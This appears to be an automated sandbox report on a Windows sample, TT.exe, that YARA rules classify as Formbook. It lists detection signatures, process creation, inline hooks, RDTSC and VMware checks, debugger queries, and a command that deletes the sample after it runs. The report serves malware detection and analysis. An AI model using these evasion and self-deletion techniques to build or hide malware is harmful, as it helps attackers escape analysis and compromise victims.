          Source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@4/3
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040473E
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_01
          Source: C:\Users\user\Desktop\TT.exeFile created: C:\Users\user\AppData\Local\Temp\nsj2C11.tmpJump to behavior
          Source: TT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: TT.exeVirustotal: Detection: 25%
          Source: TT.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\TT.exeFile read: C:\Users\user\Desktop\TT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TT.exe 'C:\Users\user\Desktop\TT.exe'
          Source: C:\Users\user\Desktop\TT.exeProcess created: C:\Users\user\Desktop\TT.exe 'C:\Users\user\Desktop\TT.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TT.exeProcess created: C:\Users\user\Desktop\TT.exe 'C:\Users\user\Desktop\TT.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TT.exe'Jump to behavior
          Source: C:\Users\user\Desktop\TT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: TT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.366025907.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: TT.exe, 00000001.00000002.396335168.0000000002810000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: TT.exe, 00000000.00000003.331979334.0000000003060000.00000004.00000001.sdmp, TT.exe, 00000001.00000002.393874457.0000000000B4F000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT.exe, msdt.exe
          Source: Binary string: msdt.pdb source: TT.exe, 00000001.00000002.396335168.0000000002810000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.366025907.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\TT.exeUnpacked PE file: 1.2.TT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041E560 push ss; ret 1_2_0041E569
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AAD0D1 push ecx; ret 1_2_00AAD0E4
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_0041E560 push ss; ret 1_1_0041E569
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D5D0D1 push ecx; ret 7_2_04D5D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DE560 push ss; ret 7_2_007DE569
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DCEB5 push eax; ret 7_2_007DCF08
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DCF6C push eax; ret 7_2_007DCF72
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DCF0B push eax; ret 7_2_007DCF72
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DCF02 push eax; ret 7_2_007DCF08
          Source: C:\Users\user\Desktop\TT.exeFile created: C:\Users\user\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEE
          Source: C:\Users\user\Desktop\TT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TT.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000007C98E4 second address: 00000000007C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000007C9B5E second address: 00000000007C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TT.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6768Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6768Thread sleep time: -62000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000004.00000000.359286524.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.359206330.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.360079783.0000000008684000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.359026970.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.355462929.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.354002009.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.359206330.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.355462929.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.359026970.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.354002009.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.354002009.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.359026970.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.359286524.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.354002009.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000004.00000002.596476580.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\TT.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TT.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]0_2_10001000
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_030216D8 mov eax, dword ptr fs:[00000030h]0_2_030216D8
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_030218F0 mov eax, dword ptr fs:[00000030h]0_2_030218F0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A990AF mov eax, dword ptr fs:[00000030h]1_2_00A990AF
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59080 mov eax, dword ptr fs:[00000030h]1_2_00A59080
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]1_2_00AD3884
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]1_2_00AD3884
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A558EC mov eax, dword ptr fs:[00000030h]1_2_00A558EC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]1_2_00B24015
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]1_2_00B24015
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B12073 mov eax, dword ptr fs:[00000030h]1_2_00B12073
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B21074 mov eax, dword ptr fs:[00000030h]1_2_00B21074
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]1_2_00A70050
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]1_2_00A70050
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]1_2_00A861A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]1_2_00A861A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD69A6 mov eax, dword ptr fs:[00000030h]1_2_00AD69A6
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7C182 mov eax, dword ptr fs:[00000030h]1_2_00A7C182
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8A185 mov eax, dword ptr fs:[00000030h]1_2_00A8A185
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82990 mov eax, dword ptr fs:[00000030h]1_2_00A82990
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AE41E8 mov eax, dword ptr fs:[00000030h]1_2_00AE41E8
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A74120 mov ecx, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]1_2_00A8513A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]1_2_00A8513A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5C962 mov eax, dword ptr fs:[00000030h]1_2_00A5C962
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]1_2_00A5B171
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]1_2_00A5B171
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]1_2_00A7B944
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]1_2_00A7B944
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A6AAB0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A6AAB0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A8FAB0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]1_2_00A8D294
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]1_2_00A8D294
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82AE4 mov eax, dword ptr fs:[00000030h]1_2_00A82AE4
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82ACB mov eax, dword ptr fs:[00000030h]1_2_00A82ACB
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]1_2_00A94A2C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]1_2_00A94A2C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A68A0A mov eax, dword ptr fs:[00000030h]1_2_00A68A0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]1_2_00A5AA16
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]1_2_00A5AA16
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A55210 mov ecx, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A73A1C mov eax, dword ptr fs:[00000030h]1_2_00A73A1C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B0B260 mov eax, dword ptr fs:[00000030h]1_2_00B0B260
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B0B260 mov eax, dword ptr fs:[00000030h]1_2_00B0B260
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B28A62 mov eax, dword ptr fs:[00000030h]1_2_00B28A62
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9927A mov eax, dword ptr fs:[00000030h]1_2_00A9927A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1EA55 mov eax, dword ptr fs:[00000030h]1_2_00B1EA55
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59240 mov eax, dword ptr fs:[00000030h]1_2_00A59240
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59240 mov eax, dword ptr fs:[00000030h]1_2_00A59240
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59240 mov eax, dword ptr fs:[00000030h]1_2_00A59240
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A59240 mov eax, dword ptr fs:[00000030h]1_2_00A59240
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00AE4257 mov eax, dword ptr fs:[00000030h]1_2_00AE4257
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84BAD mov eax, dword ptr fs:[00000030h]1_2_00A84BAD
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84BAD mov eax, dword ptr fs:[00000030h]1_2_00A84BAD
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A84BAD mov eax, dword ptr fs:[00000030h]1_2_00A84BAD
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B25BA5 mov eax, dword ptr fs:[00000030h]1_2_00B25BA5
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A61B8F mov eax, dword ptr fs:[00000030h]1_2_00A61B8F
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A61B8F mov eax, dword ptr fs:[00000030h]1_2_00A61B8F
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B0D380 mov ecx, dword ptr fs:[00000030h]1_2_00B0D380
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8B390 mov eax, dword ptr fs:[00000030h]1_2_00A8B390
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1138A mov eax, dword ptr fs:[00000030h]1_2_00B1138A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A82397 mov eax, dword ptr fs:[00000030h]1_2_00A82397
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A803E2 mov eax, dword ptr fs:[00000030h]1_2_00A803E2
